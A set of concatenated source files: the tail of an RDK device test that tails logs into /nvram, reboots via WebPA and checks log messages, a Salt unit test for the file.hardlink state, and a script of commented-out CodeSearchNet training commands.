cmd = "[ -f /rdklogs/logs/Consolelog.txt.0 ] && echo \"File exist\" || echo \"File does not exist\"";
tdkTestObj.addParameter("command",cmd);
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n", "");
if details == "File exist":
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 3: Check for Consolelog.txt.0 log file presence";
print "EXPECTED RESULT 3:Consolelog.txt.0 log file should be present";
print "ACTUAL RESULT 3:Consolelog.txt.0 file is present";
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
query="echo > /nvram/tdk_PARODUStail"
print "query:%s" %query
tdkTestObj = obj2.createTestStep('ExecuteCmd');
tdkTestObj.addParameter("command", query)
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n","");
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 4: Create a file in nvram to copy the tail -f of PARODUSlog.txt.0";
print "EXPECTED RESULT 4: Should create a file in nvram to copy the tail -f of PARODUSlog.txt.0";
print "ACTUAL RESULT 4: File creation was successful";
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
query="echo > /nvram/tdk_Consoletail"
print "query:%s" %query
tdkTestObj = obj2.createTestStep('ExecuteCmd');
tdkTestObj.addParameter("command", query)
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n","");
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 5: Create a file in nvram to copy the tail -f of Consolelog.txt.0";
print "EXPECTED RESULT 5: Should create a file in nvram to copy the tail -f of Consolelog.txt.0";
print "ACTUAL RESULT 5: File creation was successful";
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
query="tail -f /rdklogs/logs/PARODUSlog.txt.0 > /nvram/tdk_PARODUStail &"
print "query:%s" %query
tdkTestObj = obj2.createTestStep('ExecuteCmd');
tdkTestObj.addParameter("command", query)
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n","");
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 6: Tail the Parodus Logs to the file created in nvram and add the process to background";
print "EXPECTED RESULT 6: Should tail the Parodus Logs to the file created in nvram and add the process to background";
print "ACTUAL RESULT 6: Tail the Parodus Logs to the file created in nvram and add the process to background was successfull";
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
query="tail -f /rdklogs/logs/Consolelog.txt.0 > /nvram/tdk_Consoletail &"
print "query:%s" %query
tdkTestObj = obj2.createTestStep('ExecuteCmd');
tdkTestObj.addParameter("command", query)
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n","");
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 7: Tail the Console Logs to the file created in nvram and add the process to background";
print "EXPECTED RESULT 7: Should tail the Console Logs to the file created in nvram and add the process to background";
print "ACTUAL RESULT 7: Tail the Console Logs to the file created in nvram and add the process to background was successfull";
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj,preRequisiteStatus = webpaPreRequisite(obj2);
#Saving Current state before reboot
obj2.saveCurrentState();
if "SUCCESS" in preRequisiteStatus:
queryParam = {"name":"Device.X_CISCO_COM_DeviceControl.RebootDevice","value":"Device","dataType":0}
queryResponse = webpaQuery(obj2, queryParam,"set")
parsedResponse = parseWebpaResponse(queryResponse, 1, "set")
print "parsedResponse : %s" %parsedResponse;
tdkTestObj = obj2.createTestStep('ExecuteCmd');
tdkTestObj.executeTestCase("SUCCESS");
if "SUCCESS" in parsedResponse[0]:
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 8: Call for Device Reboot via WEBPA";
print "EXPECTED RESULT 8: Device Reboot via WEBPA should be successfull"
print "ACTUAL RESULT 8: Device Reboot via WEBPA was successfull";
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
#Restore the device state saved before reboot
obj2.restorePreviousStateAfterReboot();
tdkTestObj = obj2.createTestStep('ExecuteCmd');
Presult,Cresult = verify_logMsgs(tdkTestObj);
if Presult == 1 and Cresult == 1:
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 9: Check if the above mentioned LogMsgs are present in PARODUSlog.txt.0 and Consolelog.txt.0";
print "EXPECTED RESULT 9: The above mentioned LogMsgs Should be present in PARODUSlog.txt.0 and Consolelog.txt.0"
print "ACTUAL RESULT 9: The expected LogMsgs were populated successfully in PARODUSlog.txt.0 and Consolelog.txt.0";
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 9: Check if the above mentioned LogMsgs are presnt in PARODUSlog.txt.0 and Consolelog.txt.0";
print "EXPECTED RESULT 9: The above mentioned LogMsgs Should be present in PARODUSlog.txt.0 and Consolelog.txt.0"
print "ACTUAL RESULT 9: The expected LogMsgs failed to populate in PARODUSlog.txt.0 or Consolelog.txt.0";
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 8: Call for Device Reboot via WEBPA";
print "EXPECTED RESULT 8: Device Reboot via WEBPA should be successfull"
print "ACTUAL RESULT 8: Device Reboot via WEBPA was successfull";
#Get the result of execution
print "[TEST EXECUTION RESULT] :FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "Webpa Pre-requisite failed. Please check parodus and webpa processes are running in device"
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 7: Tail the Console Logs to the file created in nvram and add the process to background";
print "EXPECTED RESULT 7: Should tail the Console Logs to the file created in nvram and add the process to background";
print "ACTUAL RESULT 7: Tail the Console Logs to the file created in nvram and add the process to background failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] :FAILURE";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 6: Tail the Parodus Logs to the file created in nvram and add the process to background";
print "EXPECTED RESULT 6: Should tail the Parodus Logs to the file created in nvram and add the process to background";
print "ACTUAL RESULT 6: Tail the Parodus Logs to the file created in nvram and add the process to background failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
#Delete the file created under nvram
query="rm -rf /nvram/tdk_Consoletail"
print "query:%s" %query
tdkTestObj = obj2.createTestStep('ExecuteCmd');
tdkTestObj.addParameter("command", query)
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n","");
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 10: Delete the tdk_Consoletail file created under nvram";
print "EXPECTED RESULT 10: Should Delete the tdk_Consoletail file created under nvram";
print "ACTUAL RESULT 10: File Deletion was successfull";
#Get the result of execution
print "[TEST EXECUTION RESULT] :SUCCESS";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 10: Delete the tdk_Consoletail file created under nvram";
print "EXPECTED RESULT 10: Should Delete the tdk_Consoletail file created under nvram";
print "ACTUAL RESULT 10: File Deletion Failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] :FAILURE";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 5: Create a file in nvram to copy the tail -f of Consolelog.txt.0";
print "EXPECTED RESULT 5: Should create a file in nvram to copy the tail -f of Consolelog.txt.0";
print "ACTUAL RESULT 5: File creation failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
#Delete the file created under nvram
query="rm -rf /nvram/tdk_PARODUStail"
print "query:%s" %query
tdkTestObj = obj2.createTestStep('ExecuteCmd');
tdkTestObj.addParameter("command", query)
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n","");
if expectedresult in actualresult :
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 11: Delete the tdk_PARODUStail file created under nvram";
print "EXPECTED RESULT 11: Should Delete the tdk_PARODUStail file created under nvram";
print "ACTUAL RESULT 11: File Deletion was successful";
#Get the result of execution
print "[TEST EXECUTION RESULT] :SUCCESS";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 11: Delete the tdk_PARODUStail file created under nvram";
print "EXPECTED RESULT 11: Should Delete the tdk_PARODUStail file created under nvram";
print "ACTUAL RESULT 11: File Deletion Failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] :FAILURE";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 4: Create a file in nvram to copy the tail -f of PARODUSlog.txt.0";
print "EXPECTED RESULT 4: Should create a file in nvram to copy the tail -f of PARODUSlog.txt.0";
print "ACTUAL RESULT 4: File creation failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 3: Check for Consolelog.txt.0 log file presence";
print "EXPECTED RESULT 3: Consolelog.txt.0 log file should be present";
print "ACTUAL RESULT 3: Consolelog.txt.0 file is not present";
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 2: Check for PARODUSlog.txt.0 log file presence";
print "EXPECTED RESULT 2: PARODUSlog.txt.0 log file should be present";
print "ACTUAL RESULT 2: PARODUSlog.txt.0 file is not present";
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print "Manageable Notification was disabled and enabling it failed";
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 1: Get the status of Manageable Notification";
print "EXPECTED RESULT 1: Should get the status of Manageable Notification";
print "ACTUAL RESULT 1: Manageable Notification status is :%s" %default;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
if revertflag == 1:
tdkTestObj = obj1.createTestStep('TDKB_TR181Stub_Set');
tdkTestObj.addParameter("ParamName","Device.DeviceInfo.X_RDKCENTRAL-COM_RFC.Feature.ManageableNotification.Enable");
tdkTestObj.addParameter("ParamValue",default);
tdkTestObj.addParameter("Type","bool");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult :
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 12: Revert the Manageable Notification to previous value";
print "EXPECTED RESULT 12: Should Revert the Manageable Notification to previous value";
print "ACTUAL RESULT 12: Revert was successful";
#Get the result of execution
print "[TEST EXECUTION RESULT] :SUCCESS";
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 12: Revert the Manageable Notification to previous value";
print "EXPECTED RESULT 12: Should Revert the Manageable Notification to previous value";
print "ACTUAL RESULT 12: Revert failed";
#Get the result of execution
print "[TEST EXECUTION RESULT] :FAILURE";
obj1.unloadModule("tdkbtr181");
obj2.unloadModule("sysutil");
else:
print "Failed to load module";
obj1.setLoadModuleStatus("FAILURE");
obj2.setLoadModuleStatus("FAILURE");
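The failure branches above all funnel into the same set/verify/revert pattern driven by `revertflag`. A minimal modern-Python sketch of that pattern (the `TestStep` class, its methods, and the parameter names are illustrative stand-ins, not the real TDK API):

```python
class TestStep:
    """Hypothetical stand-in for a TDK test step (not the real TDK API)."""

    def __init__(self, store, action):
        self.store = store    # shared dict playing the role of the device's parameter tree
        self.action = action
        self.params = {}

    def add_parameter(self, key, value):
        self.params[key] = value

    def execute(self):
        # A 'Set' step writes the value; anything else reads it back.
        if self.action == "Set":
            self.store[self.params["ParamName"]] = self.params["ParamValue"]
            return "SUCCESS"
        return self.store.get(self.params.get("ParamName"), "FAILURE")


def set_verify_revert(store, param, new_value):
    """Set a parameter, verify it took effect, then restore the previous value."""
    previous = store.get(param)
    step = TestStep(store, "Set")
    step.add_parameter("ParamName", param)
    step.add_parameter("ParamValue", new_value)
    assert step.execute() == "SUCCESS"
    assert store[param] == new_value      # verify
    store[param] = previous               # revert, like the revertflag branch above
    return previous
```

The revert step is the part that keeps the device in a known state even when an intermediate step fails.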
# File: tests/pytests/unit/states/file/test_hardlink.py (repo: tomdoherty/salt, license: Apache-2.0)
import logging
import os
import pytest
import salt.serializers.json as jsonserializer
import salt.serializers.msgpack as msgpackserializer
import salt.serializers.plist as plistserializer
import salt.serializers.python as pythonserializer
import salt.serializers.yaml as yamlserializer
import salt.states.file as filestate
import salt.utils.files
import salt.utils.json
import salt.utils.platform
import salt.utils.win_functions
import salt.utils.yaml
from salt.exceptions import CommandExecutionError
from tests.support.mock import MagicMock, patch
log = logging.getLogger(__name__)
@pytest.fixture
def configure_loader_modules():
return {
filestate: {
"__env__": "base",
"__salt__": {"file.manage_file": False},
"__serializers__": {
"yaml.serialize": yamlserializer.serialize,
"yaml.seserialize": yamlserializer.serialize,
"python.serialize": pythonserializer.serialize,
"json.serialize": jsonserializer.serialize,
"plist.serialize": plistserializer.serialize,
"msgpack.serialize": msgpackserializer.serialize,
},
"__opts__": {"test": False, "cachedir": ""},
"__instance_id__": "",
"__low__": {},
"__utils__": {},
}
}
@pytest.mark.skip_on_windows(reason="Do not run on Windows")
def test_hardlink(tmp_path):
"""
Test to create a hardlink.
"""
name = str(tmp_path / "testfile.txt")
target = str(tmp_path / "target.txt")
with salt.utils.files.fopen(target, "w") as fp:
fp.write("")
test_dir = str(tmp_path)
user, group = "salt", "saltstack"
def return_val(**kwargs):
res = {
"name": name,
"result": False,
"comment": "",
"changes": {},
}
res.update(kwargs)
return res
mock_t = MagicMock(return_value=True)
mock_f = MagicMock(return_value=False)
mock_empty = MagicMock(return_value="")
mock_uid = MagicMock(return_value="U1001")
mock_gid = MagicMock(return_value="g1001")
mock_nothing = MagicMock(return_value={})
mock_stats = MagicMock(return_value={"inode": 1})
mock_execerror = MagicMock(side_effect=CommandExecutionError)
patches = {}
patches["file.user_to_uid"] = mock_empty
patches["file.group_to_gid"] = mock_empty
patches["user.info"] = mock_empty
patches["file.is_hardlink"] = mock_t
patches["file.stats"] = mock_empty
# Argument validation
with patch.dict(filestate.__salt__, patches):
expected = "Must provide name to file.hardlink"
ret = return_val(comment=expected, name="")
assert filestate.hardlink("", target) == ret
# User validation for dir_mode
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_empty}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.object(
os.path, "isabs", mock_t
):
expected = "User {} does not exist".format(user)
ret = return_val(comment=expected, name=name)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Group validation for dir_mode
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_empty}), patch.object(
os.path, "isabs", mock_t
):
expected = "Group {} does not exist".format(group)
ret = return_val(comment=expected, name=name)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Absolute path for name
nonabs = "./non-existent-path/to/non-existent-file"
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}):
expected = "Specified file {} is not an absolute path".format(nonabs)
ret = return_val(comment=expected, name=nonabs)
assert filestate.hardlink(nonabs, target, user=user, group=group) == ret
# Absolute path for target
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}):
expected = "Specified target {} is not an absolute path".format(nonabs)
ret = return_val(comment=expected, name=name)
assert filestate.hardlink(name, nonabs, user=user, group=group) == ret
# Test option -- nonexistent target
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.object(
os.path, "exists", mock_f
), patch.dict(
filestate.__opts__, {"test": True}
):
expected = "Target {} for hard link does not exist".format(target)
ret = return_val(comment=expected, name=name)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Test option -- target is a directory
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.object(
os.path, "exists", mock_t
), patch.dict(
filestate.__opts__, {"test": True}
):
expected = "Unable to hard link from directory {}".format(test_dir)
ret = return_val(comment=expected, name=name)
assert filestate.hardlink(name, test_dir, user=user, group=group) == ret
# Test option -- name is a directory
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__opts__, {"test": True}
):
expected = "Unable to hard link to directory {}".format(test_dir)
ret = return_val(comment=expected, name=test_dir)
assert filestate.hardlink(test_dir, target, user=user, group=group) == ret
# Test option -- name does not exist
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__opts__, {"test": True}
):
expected = "Hard link {} to {} is set for creation".format(name, target)
changes = dict(new=name)
ret = return_val(result=None, comment=expected, name=name, changes=changes)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Test option -- hardlink matches
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_t}
), patch.dict(
filestate.__salt__, {"file.stats": mock_stats}
), patch.object(
os.path, "exists", mock_t
), patch.dict(
filestate.__opts__, {"test": True}
):
expected = "The hard link {} is presently targetting {}".format(name, target)
ret = return_val(result=True, comment=expected, name=name)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Test option -- hardlink does not match
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_t}
), patch.dict(
filestate.__salt__, {"file.stats": mock_nothing}
), patch.object(
os.path, "exists", mock_t
), patch.dict(
filestate.__opts__, {"test": True}
):
expected = "Link {} target is set to be changed to {}".format(name, target)
changes = dict(change=name)
ret = return_val(result=None, comment=expected, name=name, changes=changes)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Test option -- force removal
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_f}
), patch.object(
os.path, "exists", mock_t
), patch.dict(
filestate.__opts__, {"test": True}
):
expected = (
"The file or directory {} is set for removal to "
"make way for a new hard link targeting {}".format(name, target)
)
ret = return_val(result=None, comment=expected, name=name)
assert (
filestate.hardlink(name, target, force=True, user=user, group=group) == ret
)
# Test option -- without force removal
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_f}
), patch.object(
os.path, "exists", mock_t
), patch.dict(
filestate.__opts__, {"test": True}
):
expected = (
"File or directory exists where the hard link {} "
"should be. Did you mean to use force?".format(name)
)
ret = return_val(result=False, comment=expected, name=name)
assert (
filestate.hardlink(name, target, force=False, user=user, group=group) == ret
)
# Target is a directory
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}):
expected = "Unable to hard link from directory {}".format(test_dir)
ret = return_val(comment=expected, name=name)
assert filestate.hardlink(name, test_dir, user=user, group=group) == ret
# Name is a directory
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}):
expected = "Unable to hard link to directory {}".format(test_dir)
ret = return_val(comment=expected, name=test_dir)
assert filestate.hardlink(test_dir, target, user=user, group=group) == ret
# Try overwrite file with link
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_f}
), patch.object(
os.path, "isfile", mock_t
):
expected = "File exists where the hard link {} should be".format(name)
ret = return_val(comment=expected, name=name)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Try overwrite link with same
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_t}
), patch.dict(
filestate.__salt__, {"file.stats": mock_stats}
), patch.object(
os.path, "isfile", mock_f
):
expected = "Target of hard link {} is already pointing to {}".format(
name, target
)
ret = return_val(result=True, comment=expected, name=name)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Really overwrite link with same
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_t}
), patch.dict(
filestate.__salt__, {"file.link": mock_t}
), patch.dict(
filestate.__salt__, {"file.stats": mock_nothing}
), patch.object(
os, "remove", mock_t
), patch.object(
os.path, "isfile", mock_f
):
expected = "Set target of hard link {} -> {}".format(name, target)
changes = dict(new=name)
ret = return_val(result=True, comment=expected, name=name, changes=changes)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Fail at overwriting link with same
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_t}
), patch.dict(
filestate.__salt__, {"file.link": mock_execerror}
), patch.dict(
filestate.__salt__, {"file.stats": mock_nothing}
), patch.object(
os, "remove", mock_t
), patch.object(
os.path, "isfile", mock_f
):
expected = "Unable to set target of hard link {} -> {}: {}".format(
name, target, ""
)
ret = return_val(result=False, comment=expected, name=name)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Make new link
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_f}
), patch.dict(
filestate.__salt__, {"file.link": mock_f}
), patch.dict(
filestate.__salt__, {"file.stats": mock_nothing}
), patch.object(
os, "remove", mock_t
), patch.object(
os.path, "isfile", mock_f
):
expected = "Created new hard link {} -> {}".format(name, target)
changes = dict(new=name)
ret = return_val(result=True, comment=expected, name=name, changes=changes)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Fail while making new link
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_f}
), patch.dict(
filestate.__salt__, {"file.link": mock_execerror}
), patch.dict(
filestate.__salt__, {"file.stats": mock_nothing}
), patch.object(
os, "remove", mock_t
), patch.object(
os.path, "isfile", mock_f
):
expected = "Unable to create new hard link {} -> {}: {}".format(
name, target, ""
)
ret = return_val(result=False, comment=expected, name=name)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Force making new link over file
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_f}
), patch.dict(
filestate.__salt__, {"file.link": mock_t}
), patch.dict(
filestate.__salt__, {"file.stats": mock_nothing}
), patch.object(
os, "remove", mock_t
), patch.object(
os.path, "isfile", mock_t
):
expected = "Created new hard link {} -> {}".format(name, target)
changes = dict(new=name)
changes["forced"] = "File for hard link was forcibly replaced"
ret = return_val(result=True, comment=expected, name=name, changes=changes)
assert (
filestate.hardlink(name, target, user=user, force=True, group=group) == ret
)
# Force making new link over file but error out
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_f}
), patch.dict(
filestate.__salt__, {"file.link": mock_execerror}
), patch.dict(
filestate.__salt__, {"file.stats": mock_nothing}
), patch.object(
os, "remove", mock_t
), patch.object(
os.path, "isfile", mock_t
):
expected = "Unable to create new hard link {} -> {}: {}".format(
name, target, ""
)
changes = dict(forced="File for hard link was forcibly replaced")
ret = return_val(result=False, comment=expected, name=name, changes=changes)
assert (
filestate.hardlink(name, target, user=user, force=True, group=group) == ret
)
patches = {}
patches["file.user_to_uid"] = mock_empty
patches["file.group_to_gid"] = mock_empty
patches["file.is_hardlink"] = mock_t
patches["file.stats"] = mock_empty
# Make new link when group is None and file.gid_to_group is unavailable
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_f}
), patch.dict(
filestate.__salt__, {"file.link": mock_f}
), patch.dict(
filestate.__salt__, {"file.stats": mock_nothing}
), patch.object(
os, "remove", mock_t
), patch.object(
os.path, "isfile", mock_f
):
group = None
expected = "Created new hard link {} -> {}".format(name, target)
changes = dict(new=name)
ret = return_val(result=True, comment=expected, name=name, changes=changes)
assert filestate.hardlink(name, target, user=user, group=group) == ret
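Every scenario in the test above is built by layering `patch.dict` contexts over the `filestate.__salt__` registry. The mechanism is easy to miss in the noise, so here is a stripped-down, self-contained sketch (the `salt_funcs` registry and `inode` helper are made up for illustration):

```python
from unittest.mock import MagicMock, patch

# A module-level registry of callables, playing the role of filestate.__salt__.
salt_funcs = {"file.stats": lambda: {"inode": 1}}

def inode():
    # Code under test resolves functions through the registry at call time,
    # which is exactly what makes patch.dict effective.
    return salt_funcs["file.stats"]()["inode"]

def demo():
    real = inode()                        # resolves through the real registry
    mock_stats = MagicMock(return_value={"inode": 42})
    with patch.dict(salt_funcs, {"file.stats": mock_stats}):
        patched = inode()                 # the mock is visible inside the context
    return real, patched, inode()         # patch.dict restores the entry on exit
```

Because `patch.dict` restores the original entries when the `with` block exits, each scenario starts from a clean registry without any manual teardown.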
# File: run.py (repo: bentrevett/CodeSearchNet, license: MIT)
import subprocess
import os
"""seeds = [2,3,4,5]
for seed in seeds:
command = f'python main2.py --lang java --model transformer --bpe_pct 0.5 --batch_size 450 --hid_dim 512 --n_layers 3 --lr 0.0005 --seed {seed}'
process = subprocess.Popen(command, shell=True)
process.wait()"""
"""lrs = [0.00075, 0.0005, 0.00025, 0.0001]
seeds = [1,1,1,1]
for lr, seed in zip(lrs, seeds):
command = f'python sequence_lm.py --lang java --model bow --data code --save_model --lr {lr} --seed {seed}'
process = subprocess.Popen(command, shell=True)
process.wait() """
"""seeds = [1,2,3,4,5]
for seed in seeds:
command = f'python sequence_lm.py --lang java --model transformer --save_model --data code --bpe_pct 0.5 --batch_size 450 --hid_dim 256 --n_layers 3 --lr 0.0005 --seed {seed}'
process = subprocess.Popen(command, shell=True)
process.wait()"""
"""seeds = [2,3,4,5]
for seed in seeds:
command = f'python main2.py --lang java --model transformer --bpe_pct 0.5 --batch_size 450 --hid_dim 256 --n_layers 3 --lr 0.0005 --seed {seed} --load'
process = subprocess.Popen(command, shell=True)
process.wait()"""
"""command = f'python sequence_lm.py --lang java --model transformer --save_model --data desc --bpe_pct 0.5 --batch_size 450 --hid_dim 256 --n_layers 3 --lr 0.0005 --seed 1'
process = subprocess.Popen(command, shell=True)
process.wait()"""
"""command = f'python sequence_lm.py --lang 6L-java --model transformer --save_model --data code --bpe_pct 0.5 --batch_size 450 --hid_dim 256 --n_layers 3 --lr 0.0005 --seed 1'
process = subprocess.Popen(command, shell=True)
process.wait()"""
"""command = f'python sequence_lm.py --lang 6L-java --model transformer --save_model --data desc --bpe_pct 0.5 --batch_size 450 --hid_dim 256 --n_layers 3 --lr 0.0005 --seed 1'
process = subprocess.Popen(command, shell=True)
process.wait()"""
"""command = f'python main2.py --lang java --model transformer --bpe_pct 0.5 --batch_size 450 --hid_dim 256 --n_layers 3 --lr 0.0005 --seed 1 --load'
process = subprocess.Popen(command, shell=True)
process.wait()"""
"""command = f'python main2.py --lang 6L-java --model transformer --bpe_pct 0.5 --batch_size 450 --hid_dim 256 --n_layers 3 --lr 0.0005 --seed 1 --load'
